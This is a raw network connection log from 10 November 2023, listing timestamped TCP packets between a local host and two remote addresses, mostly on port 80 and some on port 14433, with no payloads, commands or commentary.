Nov 10, 2023 15:36:46.741940975 CET	49728	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:46.829231977 CET	49729	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:47.038369894 CET	80	49728	95.214.26.28	192.168.2.6
Nov 10, 2023 15:36:47.127527952 CET	80	49729	95.214.26.28	192.168.2.6
Nov 10, 2023 15:36:47.129328012 CET	49729	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:47.129914999 CET	49729	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:47.129966021 CET	49729	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:47.428828001 CET	80	49729	95.214.26.28	192.168.2.6
Nov 10, 2023 15:36:47.429282904 CET	80	49729	95.214.26.28	192.168.2.6
Nov 10, 2023 15:36:47.429349899 CET	49729	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:47.429523945 CET	49729	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:47.494335890 CET	49730	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:47.727581978 CET	80	49729	95.214.26.28	192.168.2.6
Nov 10, 2023 15:36:47.795634031 CET	80	49730	95.214.26.28	192.168.2.6
Nov 10, 2023 15:36:47.795770884 CET	49730	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:47.796094894 CET	49730	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:47.796139956 CET	49730	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:48.097316027 CET	80	49730	95.214.26.28	192.168.2.6
Nov 10, 2023 15:36:48.097372055 CET	80	49730	95.214.26.28	192.168.2.6
Nov 10, 2023 15:36:48.097455025 CET	49730	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:48.097801924 CET	49730	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:48.173281908 CET	49731	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:48.398876905 CET	80	49730	95.214.26.28	192.168.2.6
Nov 10, 2023 15:36:48.470364094 CET	80	49731	95.214.26.28	192.168.2.6
Nov 10, 2023 15:36:48.470493078 CET	49731	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:48.470799923 CET	49731	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:48.470834970 CET	49731	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:48.768541098 CET	80	49731	95.214.26.28	192.168.2.6
Nov 10, 2023 15:36:48.768601894 CET	80	49731	95.214.26.28	192.168.2.6
Nov 10, 2023 15:36:48.768691063 CET	49731	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:48.768841028 CET	49731	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:49.039213896 CET	49732	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:49.065973997 CET	80	49731	95.214.26.28	192.168.2.6
Nov 10, 2023 15:36:49.337642908 CET	80	49732	95.214.26.28	192.168.2.6
Nov 10, 2023 15:36:49.337860107 CET	49732	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:49.338114023 CET	49732	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:49.338149071 CET	49732	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:49.638142109 CET	80	49732	95.214.26.28	192.168.2.6
Nov 10, 2023 15:36:49.638225079 CET	80	49732	95.214.26.28	192.168.2.6
Nov 10, 2023 15:36:49.638456106 CET	49732	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:49.639062881 CET	49732	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:49.716351032 CET	49733	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:49.936072111 CET	80	49732	95.214.26.28	192.168.2.6
Nov 10, 2023 15:36:50.017528057 CET	80	49733	95.214.26.28	192.168.2.6
Nov 10, 2023 15:36:50.017992020 CET	49733	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:50.018204927 CET	49733	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:50.018291950 CET	49733	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:50.319827080 CET	80	49733	95.214.26.28	192.168.2.6
Nov 10, 2023 15:36:50.320105076 CET	80	49733	95.214.26.28	192.168.2.6
Nov 10, 2023 15:36:50.320188999 CET	49733	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:50.320414066 CET	49733	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:50.513286114 CET	49734	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:50.621526003 CET	80	49733	95.214.26.28	192.168.2.6
Nov 10, 2023 15:36:50.814147949 CET	80	49734	95.214.26.28	192.168.2.6
Nov 10, 2023 15:36:50.814249992 CET	49734	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:50.814467907 CET	49734	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:50.814503908 CET	49734	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:51.115300894 CET	80	49734	95.214.26.28	192.168.2.6
Nov 10, 2023 15:36:51.115509033 CET	80	49734	95.214.26.28	192.168.2.6
Nov 10, 2023 15:36:51.115593910 CET	49734	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:51.120642900 CET	49734	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:51.259067059 CET	49735	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:51.421327114 CET	80	49734	95.214.26.28	192.168.2.6
Nov 10, 2023 15:36:51.558790922 CET	80	49735	95.214.26.28	192.168.2.6
Nov 10, 2023 15:36:51.558896065 CET	49735	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:51.559272051 CET	49735	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:51.559272051 CET	49735	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:51.858520031 CET	80	49735	95.214.26.28	192.168.2.6
Nov 10, 2023 15:36:51.858726025 CET	80	49735	95.214.26.28	192.168.2.6
Nov 10, 2023 15:36:51.858911991 CET	49735	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:51.859050035 CET	49735	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:52.158313036 CET	80	49735	95.214.26.28	192.168.2.6
Nov 10, 2023 15:36:54.001039028 CET	14433	49720	51.15.58.224	192.168.2.6
Nov 10, 2023 15:36:54.049161911 CET	49720	14433	192.168.2.6	51.15.58.224
Nov 10, 2023 15:36:54.591897011 CET	49736	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:54.893029928 CET	80	49736	95.214.26.28	192.168.2.6
Nov 10, 2023 15:36:54.898905039 CET	49736	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:54.899068117 CET	49736	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:54.899097919 CET	49736	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:55.200258970 CET	80	49736	95.214.26.28	192.168.2.6
Nov 10, 2023 15:36:55.200535059 CET	80	49736	95.214.26.28	192.168.2.6
Nov 10, 2023 15:36:55.200606108 CET	49736	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:55.200860977 CET	49736	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:55.502068043 CET	80	49736	95.214.26.28	192.168.2.6
Nov 10, 2023 15:36:56.563148022 CET	49737	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:56.864109039 CET	80	49737	95.214.26.28	192.168.2.6
Nov 10, 2023 15:36:56.864355087 CET	49737	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:56.864502907 CET	49737	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:56.864552021 CET	49737	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:57.165766954 CET	80	49737	95.214.26.28	192.168.2.6
Nov 10, 2023 15:36:57.166098118 CET	80	49737	95.214.26.28	192.168.2.6
Nov 10, 2023 15:36:57.166161060 CET	49737	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:57.166347980 CET	49737	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:57.467325926 CET	80	49737	95.214.26.28	192.168.2.6
Nov 10, 2023 15:37:01.647126913 CET	49738	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:37:01.946281910 CET	80	49738	95.214.26.28	192.168.2.6
Nov 10, 2023 15:37:01.946388006 CET	49738	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:37:01.946599960 CET	49738	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:37:01.946645021 CET	49738	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:37:02.246077061 CET	80	49738	95.214.26.28	192.168.2.6
Nov 10, 2023 15:37:02.246140957 CET	80	49738	95.214.26.28	192.168.2.6
Nov 10, 2023 15:37:02.246601105 CET	49738	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:37:02.246756077 CET	49738	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:37:02.546015978 CET	80	49738	95.214.26.28	192.168.2.6
Nov 10, 2023 15:37:02.715814114 CET	49739	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:37:03.015114069 CET	80	49739	95.214.26.28	192.168.2.6
Nov 10, 2023 15:37:03.016792059 CET	49739	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:37:03.017003059 CET	49739	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:37:03.017036915 CET	49739	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:37:03.316483021 CET	80	49739	95.214.26.28	192.168.2.6
Nov 10, 2023 15:37:03.316585064 CET	80	49739	95.214.26.28	192.168.2.6
Nov 10, 2023 15:37:03.316854954 CET	49739	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:37:03.316945076 CET	49739	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:37:03.616091967 CET	80	49739	95.214.26.28	192.168.2.6
Nov 10, 2023 15:37:06.116156101 CET	49740	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:37:06.416825056 CET	80	49740	95.214.26.28	192.168.2.6
Nov 10, 2023 15:37:06.420751095 CET	49740	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:37:06.420964956 CET	49740	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:37:06.420991898 CET	49740	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:37:06.721843004 CET	80	49740	95.214.26.28	192.168.2.6
Nov 10, 2023 15:37:06.721905947 CET	80	49740	95.214.26.28	192.168.2.6
Nov 10, 2023 15:37:06.721992970 CET	49740	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:37:06.722147942 CET	49740	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:37:07.022964954 CET	80	49740	95.214.26.28	192.168.2.6
Nov 10, 2023 15:37:10.343220949 CET	49741	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:37:10.642292976 CET	80	49741	95.214.26.28	192.168.2.6
Nov 10, 2023 15:37:10.642446995 CET	49741	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:37:10.642767906 CET	49741	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:37:10.643193960 CET	49741	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:37:10.942137957 CET	80	49741	95.214.26.28	192.168.2.6
Nov 10, 2023 15:37:10.942198992 CET	80	49741	95.214.26.28	192.168.2.6
Nov 10, 2023 15:37:10.942282915 CET	49741	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:37:11.241092920 CET	80	49741	95.214.26.28	192.168.2.6
Nov 10, 2023 15:37:19.305011034 CET	49743	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:37:19.611401081 CET	80	49743	95.214.26.28	192.168.2.6
Nov 10, 2023 15:37:19.611562014 CET	49743	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:37:19.611892939 CET	49743	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:37:19.611949921 CET	49743	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:37:19.918579102 CET	80	49743	95.214.26.28	192.168.2.6
Nov 10, 2023 15:37:19.918643951 CET	80	49743	95.214.26.28	192.168.2.6
Nov 10, 2023 15:37:19.920640945 CET	49743	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:37:19.920820951 CET	49743	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:37:20.227678061 CET	80	49743	95.214.26.28	192.168.2.6
Nov 10, 2023 15:37:28.031781912 CET	49744	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:37:28.333117962 CET	80	49744	95.214.26.28	192.168.2.6
Nov 10, 2023 15:37:28.333225012 CET	49744	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:37:28.333453894 CET	49744	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:37:28.333476067 CET	49744	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:37:28.634480000 CET	80	49744	95.214.26.28	192.168.2.6
Nov 10, 2023 15:37:28.634603024 CET	80	49744	95.214.26.28	192.168.2.6
Nov 10, 2023 15:37:28.634682894 CET	49744	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:37:28.634860039 CET	49744	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:37:28.935534000 CET	80	49744	95.214.26.28	192.168.2.6
Nov 10, 2023 15:37:39.854423046 CET	49745	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:37:40.159327030 CET	80	49745	95.214.26.28	192.168.2.6
Nov 10, 2023 15:37:40.159548044 CET	49745	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:37:40.159674883 CET	49745	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:37:40.159674883 CET	49745	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:37:40.464432955 CET	80	49745	95.214.26.28	192.168.2.6
Nov 10, 2023 15:37:40.464581966 CET	80	49745	95.214.26.28	192.168.2.6
Nov 10, 2023 15:37:40.464873075 CET	49745	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:37:40.464873075 CET	49745	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:37:40.769623995 CET	80	49745	95.214.26.28	192.168.2.6
Nov 10, 2023 15:37:42.940253973 CET	49746	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:37:43.240036964 CET	80	49746	95.214.26.28	192.168.2.6
Nov 10, 2023 15:37:43.242721081 CET	49746	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:37:43.242945910 CET	49746	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:37:43.242981911 CET	49746	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:37:43.542320013 CET	80	49746	95.214.26.28	192.168.2.6
Nov 10, 2023 15:37:43.542344093 CET	80	49746	95.214.26.28	192.168.2.6
Nov 10, 2023 15:37:43.542423964 CET	49746	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:37:43.542717934 CET	49746	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:37:43.841634989 CET	80	49746	95.214.26.28	192.168.2.6
Nov 10, 2023 15:37:48.916013956 CET	49747	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:37:49.217186928 CET	80	49747	95.214.26.28	192.168.2.6
Nov 10, 2023 15:37:49.217295885 CET	49747	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:37:49.217498064 CET	49747	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:37:49.217530012 CET	49747	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:37:49.518966913 CET	80	49747	95.214.26.28	192.168.2.6
Nov 10, 2023 15:37:54.967077017 CET	14433	49720	51.15.58.224	192.168.2.6
Nov 10, 2023 15:37:55.088280916 CET	49720	14433	192.168.2.6	51.15.58.224
Nov 10, 2023 15:37:58.217103958 CET	80	49747	95.214.26.28	192.168.2.6
Nov 10, 2023 15:37:58.217251062 CET	49747	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:37:58.218029976 CET	49747	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:37:58.232271910 CET	49748	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:37:58.518959045 CET	80	49747	95.214.26.28	192.168.2.6
Nov 10, 2023 15:37:58.529520988 CET	80	49748	95.214.26.28	192.168.2.6
Nov 10, 2023 15:37:58.529597998 CET	49748	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:37:58.530220032 CET	49748	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:37:58.530267954 CET	49748	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:37:58.827315092 CET	80	49748	95.214.26.28	192.168.2.6
Nov 10, 2023 15:38:00.858251095 CET	14433	49720	51.15.58.224	192.168.2.6
Nov 10, 2023 15:38:01.024584055 CET	49720	14433	192.168.2.6	51.15.58.224
Nov 10, 2023 15:38:18.258414030 CET	14433	49720	51.15.58.224	192.168.2.6
Nov 10, 2023 15:38:18.361464977 CET	49720	14433	192.168.2.6	51.15.58.224
Nov 10, 2023 15:38:18.833267927 CET	80	49748	95.214.26.28	192.168.2.6
Nov 10, 2023 15:38:18.833354950 CET	49748	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:18.833523989 CET	49748	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:18.863696098 CET	49749	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:19.130692005 CET	80	49748	95.214.26.28	192.168.2.6
Nov 10, 2023 15:38:19.161968946 CET	80	49749	95.214.26.28	192.168.2.6
Nov 10, 2023 15:38:19.162226915 CET	49749	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:19.162352085 CET	49749	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:19.162381887 CET	49749	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:19.460791111 CET	80	49749	95.214.26.28	192.168.2.6
Nov 10, 2023 15:38:26.939589024 CET	49749	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:26.952306032 CET	49750	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:27.253287077 CET	80	49750	95.214.26.28	192.168.2.6
Nov 10, 2023 15:38:27.253370047 CET	49750	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:27.253597975 CET	49750	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:27.253628016 CET	49750	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:27.554940939 CET	80	49750	95.214.26.28	192.168.2.6
Nov 10, 2023 15:38:27.555083036 CET	80	49750	95.214.26.28	192.168.2.6
Nov 10, 2023 15:38:27.555145979 CET	49750	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:27.555327892 CET	49750	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:27.566354990 CET	49751	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:27.855968952 CET	80	49750	95.214.26.28	192.168.2.6
Nov 10, 2023 15:38:27.867496014 CET	80	49751	95.214.26.28	192.168.2.6
Nov 10, 2023 15:38:27.868601084 CET	49751	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:27.868868113 CET	49751	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:27.868921041 CET	49751	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:28.169989109 CET	80	49751	95.214.26.28	192.168.2.6
Nov 10, 2023 15:38:28.170010090 CET	80	49751	95.214.26.28	192.168.2.6
Nov 10, 2023 15:38:28.170115948 CET	49751	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:28.170264006 CET	49751	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:28.191919088 CET	49752	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:28.239126921 CET	14433	49720	51.15.58.224	192.168.2.6
Nov 10, 2023 15:38:28.361387014 CET	49720	14433	192.168.2.6	51.15.58.224
Nov 10, 2023 15:38:28.471491098 CET	80	49751	95.214.26.28	192.168.2.6
Nov 10, 2023 15:38:28.493211985 CET	80	49752	95.214.26.28	192.168.2.6
Nov 10, 2023 15:38:28.493279934 CET	49752	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:28.493575096 CET	49752	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:28.493601084 CET	49752	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:28.794673920 CET	80	49752	95.214.26.28	192.168.2.6
Nov 10, 2023 15:38:28.794945002 CET	80	49752	95.214.26.28	192.168.2.6
Nov 10, 2023 15:38:28.795037031 CET	49752	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:28.795197010 CET	49752	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:28.811595917 CET	49753	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:29.097009897 CET	80	49752	95.214.26.28	192.168.2.6
Nov 10, 2023 15:38:29.108692884 CET	80	49753	95.214.26.28	192.168.2.6
Nov 10, 2023 15:38:29.108778000 CET	49753	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:29.108978033 CET	49753	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:29.109035969 CET	49753	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:29.406398058 CET	80	49753	95.214.26.28	192.168.2.6
Nov 10, 2023 15:38:29.406418085 CET	80	49753	95.214.26.28	192.168.2.6
Nov 10, 2023 15:38:29.406514883 CET	49753	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:29.406759024 CET	49753	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:29.422504902 CET	49754	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:29.704242945 CET	80	49753	95.214.26.28	192.168.2.6
Nov 10, 2023 15:38:29.724232912 CET	80	49754	95.214.26.28	192.168.2.6
Nov 10, 2023 15:38:29.724538088 CET	49754	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:29.724538088 CET	49754	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:29.725270033 CET	49754	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:30.027792931 CET	80	49754	95.214.26.28	192.168.2.6
Nov 10, 2023 15:38:30.027803898 CET	80	49754	95.214.26.28	192.168.2.6
Nov 10, 2023 15:38:30.027983904 CET	49754	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:30.028158903 CET	49754	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:30.028306961 CET	80	49754	95.214.26.28	192.168.2.6
Nov 10, 2023 15:38:30.037276983 CET	49755	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:30.328999996 CET	80	49754	95.214.26.28	192.168.2.6
Nov 10, 2023 15:38:30.329013109 CET	80	49754	95.214.26.28	192.168.2.6
Nov 10, 2023 15:38:30.336193085 CET	80	49755	95.214.26.28	192.168.2.6
Nov 10, 2023 15:38:30.336273909 CET	49755	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:30.336473942 CET	49755	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:30.336504936 CET	49755	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:30.636495113 CET	80	49755	95.214.26.28	192.168.2.6
Nov 10, 2023 15:38:30.636611938 CET	80	49755	95.214.26.28	192.168.2.6
Nov 10, 2023 15:38:30.636682034 CET	49755	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:30.636854887 CET	49755	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:30.648524046 CET	49756	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:30.935745955 CET	80	49755	95.214.26.28	192.168.2.6
Nov 10, 2023 15:38:30.956691027 CET	80	49756	95.214.26.28	192.168.2.6
Nov 10, 2023 15:38:30.958714008 CET	49756	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:30.958910942 CET	49756	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:30.959048033 CET	49756	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:31.267112017 CET	80	49756	95.214.26.28	192.168.2.6
Nov 10, 2023 15:38:31.267277002 CET	80	49756	95.214.26.28	192.168.2.6
Nov 10, 2023 15:38:31.287472010 CET	49757	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:31.585979939 CET	80	49757	95.214.26.28	192.168.2.6
Nov 10, 2023 15:38:31.588069916 CET	49757	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:31.588249922 CET	49757	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:31.588287115 CET	49757	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:31.886802912 CET	80	49757	95.214.26.28	192.168.2.6
Nov 10, 2023 15:38:31.886995077 CET	80	49757	95.214.26.28	192.168.2.6
Nov 10, 2023 15:38:31.887161016 CET	49757	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:31.887238026 CET	49757	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:31.891422987 CET	49758	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:32.185558081 CET	80	49757	95.214.26.28	192.168.2.6
Nov 10, 2023 15:38:32.199343920 CET	80	49758	95.214.26.28	192.168.2.6
Nov 10, 2023 15:38:32.199464083 CET	49758	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:32.199776888 CET	49758	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:32.199815035 CET	49758	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:32.507479906 CET	80	49758	95.214.26.28	192.168.2.6
Nov 10, 2023 15:38:32.507610083 CET	80	49758	95.214.26.28	192.168.2.6
Nov 10, 2023 15:38:32.507930040 CET	49758	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:32.507930040 CET	49758	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:32.525540113 CET	49760	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:32.815772057 CET	80	49758	95.214.26.28	192.168.2.6
Nov 10, 2023 15:38:32.824623108 CET	80	49760	95.214.26.28	192.168.2.6
Nov 10, 2023 15:38:32.824692965 CET	49760	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:32.824908018 CET	49760	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:32.824937105 CET	49760	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:33.124152899 CET	80	49760	95.214.26.28	192.168.2.6
Nov 10, 2023 15:38:33.124291897 CET	80	49760	95.214.26.28	192.168.2.6
Nov 10, 2023 15:38:33.124344110 CET	49760	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:33.124506950 CET	49760	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:33.139027119 CET	49761	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:33.423317909 CET	80	49760	95.214.26.28	192.168.2.6
Nov 10, 2023 15:38:33.440001011 CET	80	49761	95.214.26.28	192.168.2.6
Nov 10, 2023 15:38:33.440120935 CET	49761	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:33.440500021 CET	49761	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:33.440540075 CET	49761	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:33.741591930 CET	80	49761	95.214.26.28	192.168.2.6
Nov 10, 2023 15:38:33.741771936 CET	80	49761	95.214.26.28	192.168.2.6
Nov 10, 2023 15:38:33.741857052 CET	49761	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:33.742027998 CET	49761	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:33.756478071 CET	49762	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:34.043183088 CET	80	49761	95.214.26.28	192.168.2.6
Nov 10, 2023 15:38:34.055237055 CET	80	49762	95.214.26.28	192.168.2.6
Nov 10, 2023 15:38:34.055335999 CET	49762	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:34.055603981 CET	49762	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:34.055639982 CET	49762	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:34.354589939 CET	80	49762	95.214.26.28	192.168.2.6
Nov 10, 2023 15:38:34.354845047 CET	80	49762	95.214.26.28	192.168.2.6
Nov 10, 2023 15:38:34.354999065 CET	49762	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:34.355129957 CET	49762	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:34.371768951 CET	49763	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:34.653774023 CET	80	49762	95.214.26.28	192.168.2.6
Nov 10, 2023 15:38:34.670783043 CET	80	49763	95.214.26.28	192.168.2.6
Nov 10, 2023 15:38:34.670850992 CET	49763	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:34.671171904 CET	49763	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:34.671205997 CET	49763	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:34.970185995 CET	80	49763	95.214.26.28	192.168.2.6
Nov 10, 2023 15:38:34.970344067 CET	80	49763	95.214.26.28	192.168.2.6
Nov 10, 2023 15:38:34.970938921 CET	49763	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:34.972187042 CET	49763	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:34.997440100 CET	49764	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:38:35.271106005 CET	80	49763	95.214.26.28	192.168.2.6
Nov 10, 2023 15:38:35.294821978 CET	80	49764	95.214.26.28	192.168.2.6
Nov 10, 2023 15:38:35.296763897 CET	49764	80	192.168.2.6	95.214.26.28
